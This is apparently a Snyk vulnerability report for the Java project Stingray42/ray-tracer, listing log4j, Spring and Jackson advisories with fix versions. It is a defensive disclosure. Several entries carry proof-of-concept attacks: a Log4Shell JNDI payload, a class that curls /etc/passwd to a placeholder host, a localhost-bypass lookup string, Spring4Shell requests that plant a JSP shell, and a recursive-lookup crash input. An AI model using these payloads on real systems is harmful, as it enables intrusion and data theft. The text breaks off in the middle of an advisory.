Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: org.apache.logging.log4j:log4j-core@2.13.3
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.apache.logging.log4j:log4j-core@2.13.3Remediation: Upgrade to org.apache.logging.log4j:log4j-core@2.15.0.
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Remote Code Execution (RCE). Apache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
From log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.
PoC
When an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, ${jndi:ldap://someurl/Evil}. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (someurl/Evil in this example).
For example, the vulnerability can be used to inject this malicious class into an application:
public class Evil implements ObjectFactory {
@Override
public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
Runtime.getRuntime().exec("curl -F 'file=@/etc/passwđ' https://someurl/upload");
return null;
}
}
This causes the application to disclose the etc/passwd file on the system, and send it to a remote attacker.
Further Remediation Options
If upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:
- Remove
JndiLookup.classfrom the class path (i.e:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. While not pertinent to log4shell, consider also removingJndiManager,JMSAppenderandSMTPAppenderif you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future. - Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property
LOG4J_FORMAT_MSG_NO_LOOKUPSor the environmental variableDlog4j2.formatMsgNoLookupstotrue. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the com.sun.jndi.ldap.object.trustURLCodebase property to false is not enough.
For more remediation advice, please visit the Log4j Remediation Cheat Sheet post.
Note: org.apache.logging.log4j:log4j-api was originally deemed vulnerable, but Apache maintainers have since clarified that this only affects org.apache.logging.log4j:log4j-core.
Remediation
Upgrade org.apache.logging.log4j:log4j-core to version 2.3.1, 2.12.2, 2.15.0 or higher.
Use this guide to scan your projects for the Log4Shell vulnerability.
References
critical severity
- Vulnerable module: org.springframework:spring-beans
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.20.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.20.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE
Overview
org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via manipulation of ClassLoader that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).
Note:
Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish.
However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well.
As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed
spring-beansversion regardless of the application configuration.
Update Log
- 31/03/2022 - Severity was raised from 8.1 to 9.8
- 08/04/2022 - Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish).
PoC
1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
2/ ./mvnw install
3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
4/ curl -X POST \
-H "pre:<%" \
-H "post:;%>" \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
http://localhost:8888/handling-form-submission-complete/greeting
5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp
Remediation
Upgrade org.springframework:spring-beans to version 5.2.20, 5.3.18 or higher.
References
critical severity
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: org.apache.logging.log4j:log4j-core@2.13.3
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.apache.logging.log4j:log4j-core@2.13.3Remediation: Upgrade to org.apache.logging.log4j:log4j-core@2.16.0.
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:
- Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using
%m{lookups}asformatMsgNoLookupsis switched on by default as of version 2.15.0. - Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),
- Or uses
Logger.printf("%s", userInput)function where attackers can control the userInput variable.
A malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}.
We recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
PoC
In config:
<pattern>%d %p %c{1.} [%t] $${ctx:loginId} %m%n</pattern>
In code:
ThreadContext.put("loginId", UserControlledInput);
History
This vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).
Furthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.
On December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.
Remediation
Upgrade org.apache.logging.log4j:log4j-core to version 2.3.1, 2.12.2, 2.16.0 or higher.
References
high severity
- Vulnerable module: org.apache.commons:commons-lang3
- Introduced through: org.apache.commons:commons-lang3@3.9
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.apache.commons:commons-lang3@3.9Remediation: Upgrade to org.apache.commons:commons-lang3@3.18.0.
Overview
Affected versions of this package are vulnerable to Uncontrolled Recursion via the ClassUtils.getClass function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.
Remediation
Upgrade org.apache.commons:commons-lang3 to version 3.18.0 or higher.
References
high severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.10.5.1 and com.fasterxml.jackson.core:jackson-databind@2.10.5.1
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-core@2.10.5.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.15.0.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-databind@2.10.5.1 › com.fasterxml.jackson.core:jackson-core@2.10.5Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.15.0.
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing input size validation when performing numeric type conversions. A remote attacker can exploit this vulnerability by causing the application to deserialize data containing certain numeric types with large values, causing the application to exhaust all available resources.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.15.0-rc1 or higher.
References
high severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.10.5.1 and com.fasterxml.jackson.core:jackson-databind@2.10.5.1
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-core@2.10.5.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.15.0.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-databind@2.10.5.1 › com.fasterxml.jackson.core:jackson-core@2.10.5Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.15.0.
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Stack-based Buffer Overflow due to the parse process, which accepts an unlimited input file with deeply nested data. An attacker can cause a stack overflow and crash the application by providing input files with excessively deep nesting.
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.15.0-rc1 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-core
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.2.11.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.2.11.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.2.11.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.2.11.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.2.11.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
Overview
org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.
Affected versions of this package are vulnerable to Incorrect Authorization via the AnnotationsScanner and AnnotatedMethod class. An attacker can gain unauthorized access to sensitive information by exploiting improper resolution of annotations on methods within type hierarchies that use parameterized supertypes with unbounded generics.
Note:
This is only exploitable if security annotations are used on methods in generic superclasses or generic interfaces and the @EnableMethodSecurity feature is enabled.
Remediation
Upgrade org.springframework:spring-core to version 6.2.11 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-beans
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.2.10.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.2.10.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE
Overview
org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.
Affected versions of this package are vulnerable to Relative Path Traversal when deployed on non-compliant Servlet containers. An unauthenticated attacker could gain access to files and directories outside the intended web root.
Notes:
This is only exploitable if the application is deployed as a WAR or with an embedded Servlet container, the Servlet container does not reject suspicious sequences and the application serves static resources with Spring resource handling.
Applications deployed on Apache Tomcat or Eclipse Jetty are not vulnerable, as long as default security features are not disabled in the configuration.
This vulnerability was also fixed in the commercial versions 6.1.22 and 5.3.44.
Remediation
Upgrade org.springframework:spring-beans to version 6.2.10 or higher.
References
high severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-databind
- Introduced through: com.fasterxml.jackson.core:jackson-databind@2.10.5.1
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-databind@2.10.5.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.12.6.1.
Overview
com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.
Affected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.6.1, 2.13.2.1 or higher.
References
high severity
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: org.apache.logging.log4j:log4j-core@2.13.3
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.apache.logging.log4j:log4j-core@2.13.3Remediation: Upgrade to org.apache.logging.log4j:log4j-core@2.17.0.
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups.
When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process.
PoC
In log4j.properties:
appender.console.type = Console
appender.console.name = console
appender.console.layout.type = PatternLayout
appender.console.layout.pattern = !${ctx:test}! %m%n
rootLogger.level = ALL
rootLogger.appenderRef.file.ref = console
In Main.java:
ThreadContext.put("test", "${::-${ctx:test}}");
logger.error("boom"); // Will not be logged
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.apache.logging.log4j:log4j-core to version 2.3.1, 2.12.3, 2.17.0 or higher.
References
medium severity
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: org.apache.logging.log4j:log4j-core@2.13.3
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.apache.logging.log4j:log4j-core@2.13.3Remediation: Upgrade to org.apache.logging.log4j:log4j-core@2.17.1.
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Even though this vulnerability appears to be related to the log4Shell vulnerability, this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.
An attacker with access to modification of logging configuration is able to configure JDBCAppender with a data source referencing a JNDI URI - which can execute malicious code.
In the fixed versions, JDBCAppender is using JndiManager and disables JNDI lookups by default (via log4j2.enableJndiJdbc=false).
Alternative Remediation
If you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:
- Disable/remove
JDBCAppender - If
JDBCAppenderis used, make sure that it is not configured to use any protocol other than Java
Remediation
Upgrade org.apache.logging.log4j:log4j-core to version 2.3.2, 2.12.4, 2.17.1 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-expression
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.24.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long SpEL expression.
Remediation
Upgrade org.springframework:spring-expression to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.
References
medium severity
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: org.apache.logging.log4j:log4j-core@2.13.3
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.apache.logging.log4j:log4j-core@2.13.3Remediation: Upgrade to org.apache.logging.log4j:log4j-core@2.25.3.
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Improper Validation of Certificate with Host Mismatch due to the lack of TLS hostname verification in the SocketAppender component. An attacker can intercept or redirect log traffic by performing a man-in-the-middle attack if they are able to intercept or redirect network traffic between the client and the log receiver and can present a server certificate issued by a certification authority trusted by the configured trust store or the default Java trust store.
Workaround
This vulnerability can be mitigated by configuring the SocketAppender to use a private or restricted trust root to limit the set of trusted certificates.
Remediation
Upgrade org.apache.logging.log4j:log4j-core to version 2.25.3 or higher.
References
medium severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-databind
- Introduced through: com.fasterxml.jackson.core:jackson-databind@2.10.5.1
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-databind@2.10.5.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.12.6.
Overview
com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.
Affected versions of this package are vulnerable to Denial of Service (DoS) when using JDK serialization to serialize and deserialize JsonNode values.
It is possible for the attacker to send a 4-byte length payload, with a value of Integer.MAX_VALUE , that will eventually cause large buffer allocation and out of heap memory.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.13.1, 2.12.6 or higher.
References
medium severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-databind
- Introduced through: com.fasterxml.jackson.core:jackson-databind@2.10.5.1
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-databind@2.10.5.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.12.7.1.
Overview
com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.
Affected versions of this package are vulnerable to Denial of Service (DoS) in the _deserializeFromArray() function in BeanDeserializer, due to resource exhaustion when processing a deeply nested array.
NOTE:
For this vulnerability to be exploitable the non-default DeserializationFeature must be enabled.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.7.1, 2.13.4 or higher.
References
medium severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-databind
- Introduced through: com.fasterxml.jackson.core:jackson-databind@2.10.5.1
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-databind@2.10.5.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.12.7.1.
Overview
com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.
Affected versions of this package are vulnerable to Denial of Service (DoS) in the _deserializeWrappedValue() function in StdDeserializer.java, due to resource exhaustion when processing deeply nested arrays.
NOTE: This vulnerability is only exploitable when the non-default UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.7.1, 2.13.4.1 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-beans
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.22.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.22.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE
Overview
org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.
Affected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
